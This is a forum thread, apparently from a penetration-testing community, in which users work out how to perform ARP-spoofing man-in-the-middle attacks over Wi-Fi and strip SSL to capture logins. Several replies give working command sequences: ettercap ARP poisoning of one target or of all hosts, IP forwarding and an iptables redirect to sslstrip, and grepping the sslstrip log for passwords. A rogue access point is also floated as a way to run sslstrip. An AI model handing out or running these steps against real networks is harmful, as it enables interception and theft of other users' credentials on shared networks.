not sure if you can do it on wlan protos!
hi there,
following scenario:
my homenetwork ->
- wlan router (speedport 701)
- eee 1000h (victim running WinXP, connected via wlan)
- eee 1000h (attacker running BT4 or ubuntu 9.04, connected via wlan)
If I connect the eee's with a wire to the router I can arpspoof the victim and then strip the ssl connection.
But how do I do that in a wlan network?
If I arpspoof the wlan victim it's cut off the network...
I think it's because the victim thinks that I am the access point and not only the router.
So how can I strip the ssl in a wlan connection?
Edit:
If I connect the victim and the attacker via cable it works...
So it's not my dumbness!
Edit2:
Ok, I thought about my thread and the problem is not how to sslstrip.
The problem is how to do a MITM in a wlan!
Guessing you are having problems with arpspoof. It is kind of picky on what cards you have. Use ettercap.
ettercap -T -q -i wlan0 -M arp /victim ip ie 192.169.0.101/ //
-T is for just text, -q is for quit, -i is your interface, -M is MITM, arp is to arp em! If you don't know what the target ip is then nail em all.
ettercap -T -q -i wlan0 -M arp // //
Don't do this on a network with a zillion people on it.
Not sure what card you have but you said wlan so I guess you have an Alfa or something like that.
Let me explain officer, I am not a hacker. I am a security tester of sorts!
To my knowledge, arpspoof is broken with reference to the network interface option. A patched version can be found HERE. I know this version of arpspoof will work fine over wireless for MITM.
If you don't feel like downloading the patched version of arpspoof that cypersnpr talks about, this is another way of doing what you want. The patched arpspoof works well.
onryo# echo "1" > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# python ./sslstrip.py -p -f -l 8080 (-p only SSL POST, -f favicon)
# ettercap -T -q -i wlan0 -M arp /target IP/ // ( /666.666.666.666/ // )
# cat sslstrip.log | grep (ie pw, pass, login etc)
Let me explain officer, I am not a hacker. I am a security tester of sorts!
Ok, tried it with ettercap, worked fine, BUT...
As I started sslstrip all connections to http sites were blocked!
https sites work.
I tried it with
Code: sslstrip -f -k -l 8080
and with
Code: sslstrip -p -f -l 8080
but nothing works.
If I stop sslstrip the connection works.
Ideas?
EDIT:
This is done under ubuntu 9.04, didn't try it with BT4
But in my opinion it should work there too...
EDIT2:
Just tried it in BT4 and it works...
But WHY?!
Why does it work in BT and not in Ubuntu 9.04?
even with the patched version of arpspoof i still had probs.
ettercap is much better to use, and worked like a charm.
hey did you know you can run sslstrip on a rogue AP =] just found that out the other day, i might write up a guide on it a little later as it doesn't seem to be mentioned much.
think dual FON
Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.